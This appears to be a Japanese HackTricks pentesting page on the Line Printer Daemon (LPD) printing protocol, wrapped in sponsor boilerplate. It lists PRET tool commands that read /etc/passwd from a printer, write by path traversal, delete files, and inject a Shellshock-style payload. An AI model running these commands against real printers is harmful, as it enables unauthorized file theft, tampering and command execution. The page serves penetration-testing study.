AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をご覧ください! HackTricksをサポートする他の方法: * **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。 * [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックする * 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。 * [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
Line Printer Daemon (LPD) プロトコルは元々80年代のBerkeley Unixで導入されました(後にRFC1179によって規定されました)。\ デーモンは515/tcpポートで実行され、`lpr`コマンドを使用してアクセスできます。印刷するには、クライアントはジョブ/ユーザー名を定義する**コントロールファイル**と、印刷される実際のデータを含む**データファイル**を送信します。データファイルの**入力タイプ**は、**様々なファイル形式**の中からコントロールファイルで設定できます。しかし、印刷データの実際の処理方法はLPDの実装次第です。Unix系オペレーティングシステムのための人気なLPD実装にはLPRngがあります。LPDは、**悪意のあるPostScript**や**PJLプリントジョブ**を展開するためのキャリアとして使用されることがあります。 `lpdprint`と`lpdtest`ツールは[**PRET**](https://github.com/RUB-NDS/PRET)に含まれています。これらはLPD対応プリンターに直接データを印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です: ``` lpdprint.py hostname filename lpdtest.py hostname get /etc/passwd lpdtest.py hostname put ../../etc/passwd lpdtest.py hostname rm /some/file/on/printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' lpdtest.py hostname mail lpdtest@mailhost.local ``` プリンターのハッキングについてもっと学びたい場合は、[**このページを読んでください**](pentesting-printers/)。 # Shodan * `port 515`
AWSハッキングをゼロからヒーローまで学ぶには htARTE (HackTricks AWS Red Team Expert)をチェックしてください! HackTricksをサポートする他の方法: * あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください! * [**公式のPEASS & HackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。 * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。 * 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローしてください。** * [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**